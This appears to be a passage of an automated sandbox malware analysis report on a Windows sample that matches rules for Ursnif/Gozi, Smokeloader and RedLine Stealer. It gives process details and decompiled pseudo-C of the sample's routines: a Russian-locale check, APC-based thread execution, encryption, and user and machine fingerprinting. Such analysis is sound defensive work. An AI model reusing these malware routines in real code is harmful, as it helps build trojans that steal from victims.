              Mar 20, 2023 13:48:06.764988899 CET192.168.2.38.8.8.80x7987Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 20, 2023 13:48:06.785341024 CET8.8.8.8192.168.2.30x7987Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false

              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:13:47:21
              Start date:20/03/2023
              Path:C:\Users\user\Desktop\server.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\server.exe
              Imagebase:0x400000
              File size:181760 bytes
              MD5 hash:2CA14653601A8E9ADB830E183C5874D7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Reset < >

                Control-flow Graph

                C-Code - Quality: 85%
                			E004019F1() {
                				long _v8;
                				char _v12;
                				char _v16;
                				void* _v40;
                				long _t28;
                				long _t30;
                				long _t31;
                				signed short _t33;
                				void* _t37;
                				long _t40;
                				long _t41;
                				void* _t48;
                				intOrPtr _t50;
                				signed int _t57;
                				signed int _t58;
                				long _t63;
                				long _t65;
                				intOrPtr _t66;
                				void* _t71;
                				void* _t75;
                				signed int _t77;
                				signed int _t78;
                				void* _t82;
                				intOrPtr* _t83;
                
                				_t28 = E00401D68();
                				_v8 = _t28;
                				if(_t28 != 0) {
                					return _t28;
                				}
                				do {
                					_t77 = 0;
                					_v12 = 0;
                					_t63 = 0x30;
                					do {
                						_t71 = E004012E6(_t63);
                						if(_t71 == 0) {
                							_v8 = 8;
                						} else {
                							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                							_t67 = _t57;
                							_t58 = _t57 & 0x0000ffff;
                							_v8 = _t58;
                							if(_t58 == 4) {
                								_t63 = _t63 + 0x30;
                							}
                							_t78 = 0x13;
                							_t10 = _t67 + 1; // 0x1
                							_t77 =  *_t71 % _t78 + _t10;
                							E00401BA9(_t71);
                						}
                					} while (_v8 != 0);
                					_t30 = E00401688(_t77); // executed
                					_v8 = _t30;
                					Sleep(_t77 << 4); // executed
                					_t31 = _v8;
                				} while (_t31 == 0x15);
                				if(_t31 != 0) {
                					L30:
                					return _t31;
                				}
                				_v12 = 0;
                				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                				if(_t33 == 0) {
                					__imp__GetSystemDefaultUILanguage();
                					_t67 =  &_v12;
                					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                				}
                				if(_v12 == 0x5552) {
                					L28:
                					_t31 = _v8;
                					if(_t31 == 0xffffffff) {
                						_t31 = GetLastError();
                					}
                					goto L30;
                				} else {
                					if(E00401800(_t67,  &_v16) != 0) {
                						 *0x404178 = 0;
                						L20:
                						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                						_t82 = _t37;
                						if(_t82 == 0) {
                							L27:
                							_v8 = GetLastError();
                							goto L28;
                						}
                						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                						if(_t40 == 0) {
                							_t65 = GetLastError();
                							TerminateThread(_t82, _t65);
                							CloseHandle(_t82);
                							_t82 = 0;
                							SetLastError(_t65);
                						}
                						if(_t82 == 0) {
                							goto L27;
                						} else {
                							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                							_v8 = _t41;
                							if(_t41 == 0) {
                								GetExitCodeThread(_t82,  &_v8);
                							}
                							CloseHandle(_t82);
                							goto L28;
                						}
                					}
                					_t66 = _v16;
                					_t83 = __imp__GetLongPathNameW;
                					_t48 =  *_t83(_t66, 0, 0); // executed
                					_t75 = _t48;
                					if(_t75 == 0) {
                						L18:
                						 *0x404178 = _t66;
                						goto L20;
                					}
                					_t22 = _t75 + 2; // 0x2
                					_t50 = E004012E6(_t75 + _t22);
                					 *0x404178 = _t50;
                					if(_t50 == 0) {
                						goto L18;
                					}
                					 *_t83(_t66, _t50, _t75); // executed
                					E00401BA9(_t66);
                					goto L20;
                				}
                			}



























                0x004019f7
                0x004019fc
                0x00401a01
                0x00401ba8
                0x00401ba8
                0x00401a0a
                0x00401a0a
                0x00401a0e
                0x00401a11
                0x00401a12
                0x00401a18
                0x00401a1c
                0x00401a53
                0x00401a1e
                0x00401a26
                0x00401a2c
                0x00401a2e
                0x00401a33
                0x00401a39
                0x00401a3b
                0x00401a3b
                0x00401a42
                0x00401a48
                0x00401a48
                0x00401a4c
                0x00401a4c
                0x00401a5a
                0x00401a61
                0x00401a6a
                0x00401a6d
                0x00401a73
                0x00401a76
                0x00401a7f
                0x00401ba4
                0x00000000
                0x00401ba6
                0x00401a92
                0x00401a95
                0x00401a9d
                0x00401a9f
                0x00401aaa
                0x00401ab2
                0x00401ab2
                0x00401ac0
                0x00401b96
                0x00401b96
                0x00401b9c
                0x00401b9e
                0x00401b9e
                0x00000000
                0x00401ac6
                0x00401ad1
                0x00401b0f
                0x00401b15
                0x00401b27
                0x00401b2d
                0x00401b31
                0x00401b8d
                0x00401b93
                0x00000000
                0x00401b93
                0x00401b3d
                0x00401b4b
                0x00401b53
                0x00401b57
                0x00401b5e
                0x00401b61
                0x00401b63
                0x00401b63
                0x00401b6b
                0x00000000
                0x00401b6d
                0x00401b70
                0x00401b76
                0x00401b7b
                0x00401b82
                0x00401b82
                0x00401b89
                0x00000000
                0x00401b89
                0x00401b6b
                0x00401ad3
                0x00401ad8
                0x00401adf
                0x00401ae1
                0x00401ae5
                0x00401b07
                0x00401b07
                0x00000000
                0x00401b07
                0x00401ae7
                0x00401aec
                0x00401af1
                0x00401af8
                0x00000000
                0x00000000
                0x00401afd
                0x00401b00
                0x00000000
                0x00401b00

                APIs
                  • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                  • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                  • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                  • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
                • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 3475612337-0
                • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 153 2221508-2221548 CryptAcquireContextW 154 222154e-222158a memcpy CryptImportKey 153->154 155 222169f-22216a5 GetLastError 153->155 157 2221590-22215a2 CryptSetKeyParam 154->157 158 222168a-2221690 GetLastError 154->158 156 22216a8-22216af 155->156 160 2221676-222167c GetLastError 157->160 161 22215a8-22215b1 157->161 159 2221693-222169d CryptReleaseContext 158->159 159->156 164 222167f-2221688 CryptDestroyKey 160->164 162 22215b3-22215b5 161->162 163 22215b9-22215c6 call 22233dc 161->163 162->163 165 22215b7 162->165 168 22215cc-22215d5 163->168 169 222166d-2221674 163->169 164->159 165->163 170 22215d8-22215e0 168->170 169->164 171 22215e2 170->171 172 22215e5-2221602 memcpy 170->172 171->172 173 2221604-222161b CryptEncrypt 172->173 174 222161d-2221629 172->174 175 2221632-2221634 173->175 174->175 176 2221636-2221640 175->176 177 2221644-222164f GetLastError 175->177 176->170 178 2221642 176->178 179 2221663-222166b call 22261da 177->179 180 2221651-2221661 177->180 178->180 179->164 180->164
                C-Code - Quality: 50%
                			E02221508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				int _v8;
                				long* _v12;
                				int _v16;
                				void* _v20;
                				long* _v24;
                				void* _v39;
                				char _v40;
                				void _v56;
                				int _v60;
                				intOrPtr _v64;
                				void _v67;
                				char _v68;
                				void* _t61;
                				int _t68;
                				signed int _t76;
                				int _t79;
                				int _t81;
                				void* _t85;
                				long _t86;
                				int _t90;
                				signed int _t94;
                				int _t101;
                				void* _t102;
                				int _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                
                				_t103 = __eax;
                				_t94 = 6;
                				_v68 = 0;
                				memset( &_v67, 0, _t94 << 2);
                				_t105 = _t104 + 0xc;
                				asm("stosw");
                				asm("stosb");
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				asm("stosb");
                				_t61 =  *0x222a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                				if(_t61 == 0) {
                					_a8 = GetLastError();
                				} else {
                					_t101 = 0x10;
                					memcpy( &_v56, _a8, _t101);
                					_t106 = _t105 + 0xc;
                					_v60 = _t101;
                					_v67 = 2;
                					_v64 = 0x660e;
                					_v68 = 8;
                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                					if(_t68 == 0) {
                						_a8 = GetLastError();
                					} else {
                						_push(0);
                						_push( &_v40);
                						_push(1);
                						_push(_v12);
                						if( *0x222a0e4() == 0) {
                							_a8 = GetLastError();
                						} else {
                							_t18 = _t103 + 0xf; // 0x10
                							_t76 = _t18 & 0xfffffff0;
                							if(_a4 != 0 && _t76 == _t103) {
                								_t76 = _t76 + _t101;
                							}
                							_t102 = E022233DC(_t76);
                							_v20 = _t102;
                							if(_t102 == 0) {
                								_a8 = 8;
                							} else {
                								_v16 = 0;
                								_a8 = 0;
                								while(1) {
                									_t79 = 0x10;
                									_v8 = _t79;
                									if(_t103 <= _t79) {
                										_v8 = _t103;
                									}
                									memcpy(_t102, _a12, _v8);
                									_t81 = _v8;
                									_a12 = _a12 + _t81;
                									_t103 = _t103 - _t81;
                									_t106 = _t106 + 0xc;
                									if(_a4 == 0) {
                										_t85 =  *0x222a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                									} else {
                										_t85 =  *0x222a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                									}
                									if(_t85 == 0) {
                										break;
                									}
                									_t90 = _v8;
                									_v16 = _v16 + _t90;
                									_t102 = _t102 + _t90;
                									if(_t103 != 0) {
                										continue;
                									} else {
                										L17:
                										 *_a16 = _v20;
                										 *_a20 = _v16;
                									}
                									goto L21;
                								}
                								_t86 = GetLastError();
                								_a8 = _t86;
                								if(_t86 != 0) {
                									E022261DA(_v20);
                								} else {
                									goto L17;
                								}
                							}
                						}
                						L21:
                						CryptDestroyKey(_v12);
                					}
                					CryptReleaseContext(_v24, 0);
                				}
                				return _a8;
                			}






























                0x02221511
                0x02221517
                0x0222151a
                0x02221520
                0x02221520
                0x02221522
                0x02221524
                0x02221527
                0x0222152d
                0x0222152e
                0x0222152f
                0x02221535
                0x0222153a
                0x02221540
                0x02221548
                0x022216a5
                0x0222154e
                0x02221550
                0x02221559
                0x0222155e
                0x02221570
                0x02221573
                0x02221577
                0x0222157e
                0x02221582
                0x0222158a
                0x02221690
                0x02221590
                0x02221590
                0x02221594
                0x02221595
                0x02221597
                0x022215a2
                0x0222167c
                0x022215a8
                0x022215a8
                0x022215ab
                0x022215b1
                0x022215b7
                0x022215b7
                0x022215bf
                0x022215c1
                0x022215c6
                0x0222166d
                0x022215cc
                0x022215d2
                0x022215d5
                0x022215d8
                0x022215da
                0x022215db
                0x022215e0
                0x022215e2
                0x022215e2
                0x022215ec
                0x022215f1
                0x022215f4
                0x022215f7
                0x022215f9
                0x02221602
                0x0222162c
                0x02221604
                0x02221615
                0x02221615
                0x02221634
                0x00000000
                0x00000000
                0x02221636
                0x02221639
                0x0222163c
                0x02221640
                0x00000000
                0x02221642
                0x02221651
                0x02221657
                0x0222165f
                0x0222165f
                0x00000000
                0x02221640
                0x02221644
                0x0222164a
                0x0222164f
                0x02221666
                0x00000000
                0x00000000
                0x00000000
                0x0222164f
                0x022215c6
                0x0222167f
                0x02221682
                0x02221682
                0x02221697
                0x02221697
                0x022216af

                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02225088,00000001,02223ECE,00000000), ref: 02221540
                • memcpy.NTDLL(02225088,02223ECE,00000010,?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740), ref: 02221559
                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02221582
                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0222159A
                • memcpy.NTDLL(00000000,7491C740,02BD9600,00000010), ref: 022215EC
                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02BD9600,00000020,?,?,00000010), ref: 02221615
                • GetLastError.KERNEL32(?,?,00000010), ref: 02221644
                • GetLastError.KERNEL32 ref: 02221676
                • CryptDestroyKey.ADVAPI32(00000000), ref: 02221682
                • GetLastError.KERNEL32 ref: 0222168A
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02221697
                • GetLastError.KERNEL32(?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 0222169F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 3401600162-0
                • Opcode ID: ad4873d95d6dc5443343f833d1fffea851b0ecadfb6f28ac05aa0e410b61069f
                • Instruction ID: 51829536dbeb6e702e2dc3a4f76cebd985fcb8acbedfdfd0f13edf3184c8d00e
                • Opcode Fuzzy Hash: ad4873d95d6dc5443343f833d1fffea851b0ecadfb6f28ac05aa0e410b61069f
                • Instruction Fuzzy Hash: 48515CB1910219BFDB20DFE4D888EAE7BB9FB08340F048465F919E6145D7768A68CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 310 2223bd3-2223be7 311 2223bf1-2223c03 call 22271cd 310->311 312 2223be9-2223bee 310->312 315 2223c57-2223c64 311->315 316 2223c05-2223c15 GetUserNameW 311->316 312->311 317 2223c66-2223c7d GetComputerNameW 315->317 316->317 318 2223c17-2223c27 RtlAllocateHeap 316->318 320 2223cbb-2223cdf 317->320 321 2223c7f-2223c90 RtlAllocateHeap 317->321 318->317 319 2223c29-2223c36 GetUserNameW 318->319 322 2223c46-2223c55 HeapFree 319->322 323 2223c38-2223c44 call 22256b9 319->323 321->320 324 2223c92-2223c9b GetComputerNameW 321->324 322->317 323->322 325 2223cac-2223cb5 HeapFree 324->325 326 2223c9d-2223ca9 call 22256b9 324->326 325->320 326->325
                C-Code - Quality: 96%
                			E02223BD3(char __eax, void* __esi) {
                				long _v8;
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				void* _t69;
                
                				_t69 = __esi;
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x222a310; // 0xd448b889
                					_v12 = _t59;
                				}
                				_t64 = _t69;
                				E022271CD( &_v12, _t64);
                				if(_t65 != 0) {
                					 *_t69 =  *_t69 ^  *0x222a344 ^ 0x6c7261ae;
                				} else {
                					GetUserNameW(0,  &_v8); // executed
                					_t50 = _v8;
                					if(_t50 != 0) {
                						_t62 = RtlAllocateHeap( *0x222a2d8, 0, _t50 + _t50);
                						if(_t62 != 0) {
                							if(GetUserNameW(_t62,  &_v8) != 0) {
                								_t64 = _t62;
                								 *_t69 =  *_t69 ^ E022256B9(_v8 + _v8, _t64);
                							}
                							HeapFree( *0x222a2d8, 0, _t62);
                						}
                					}
                				}
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x222a2d8, 0, _t34 + _t34);
                					if(_t68 != 0) {
                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                							_t64 = _t68;
                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E022256B9(_v8 + _v8, _t64);
                						}
                						HeapFree( *0x222a2d8, 0, _t68);
                					}
                				}
                				asm("cpuid");
                				_t67 =  &_v28;
                				 *_t67 = 1;
                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                				 *((intOrPtr*)(_t67 + 8)) = 0;
                				 *(_t67 + 0xc) = _t64;
                				_t39 = _v16 ^ _v20 ^ _v28;
                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                				return _t39;
                			}



















                0x02223bd3
                0x02223bdb
                0x02223bdf
                0x02223be2
                0x02223be7
                0x02223be9
                0x02223bee
                0x02223bee
                0x02223bf4
                0x02223bf6
                0x02223c03
                0x02223c64
                0x02223c05
                0x02223c0a
                0x02223c10
                0x02223c15
                0x02223c23
                0x02223c27
                0x02223c36
                0x02223c3d
                0x02223c44
                0x02223c44
                0x02223c4f
                0x02223c4f
                0x02223c27
                0x02223c15
                0x02223c66
                0x02223c6c
                0x02223c76
                0x02223c78
                0x02223c7d
                0x02223c8c
                0x02223c90
                0x02223c9b
                0x02223ca2
                0x02223ca9
                0x02223ca9
                0x02223cb5
                0x02223cb5
                0x02223c90
                0x02223cc0
                0x02223cc2
                0x02223cc5
                0x02223cc7
                0x02223cca
                0x02223ccd
                0x02223cd7
                0x02223cdb
                0x02223cdf

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 02223C0A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02223C21
                • GetUserNameW.ADVAPI32(00000000,?), ref: 02223C2E
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223C4F
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02223C76
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02223C8A
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02223C97
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223CB5
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID:
                • API String ID: 3239747167-0
                • Opcode ID: 7f23a7ee9ca598509f5b03f58f74ab3fcfe184c3d9ffa57fead221c908d01f9a
                • Instruction ID: c6bd4035ee3dfd19aad5ac29632c47d424c1f01c14e63af0ac36293c408fa7fb
                • Opcode Fuzzy Hash: 7f23a7ee9ca598509f5b03f58f74ab3fcfe184c3d9ffa57fead221c908d01f9a
                • Instruction Fuzzy Hash: F9316B71A1020AFFD720DFE8DD84B6EB7F9EB48300F219469E504D3214D736EA689B10
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 38%
                			E0222421F(char _a4, void* _a8) {
                				void* _v8;
                				void* _v12;
                				char _v16;
                				void* _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);
                					if(_t33 >= 0) {
                						_t47 = __imp__;
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                						_t44 = E022233DC(_a4);
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);
                								_t48 = 1;
                							}
                							E022261DA(_t44);
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}



















                0x0222422c
                0x0222422d
                0x0222422e
                0x0222422f
                0x02224230
                0x02224234
                0x0222423b
                0x0222424a
                0x0222424d
                0x02224250
                0x02224257
                0x0222425a
                0x0222425d
                0x02224260
                0x02224263
                0x0222426e
                0x02224270
                0x02224279
                0x02224281
                0x02224283
                0x02224295
                0x0222429f
                0x022242a3
                0x022242b2
                0x022242b6
                0x022242bf
                0x022242c7
                0x022242c7
                0x022242c9
                0x022242c9
                0x022242d1
                0x022242d7
                0x022242db
                0x022242db
                0x022242e6

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02224266
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02224279
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02224295
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
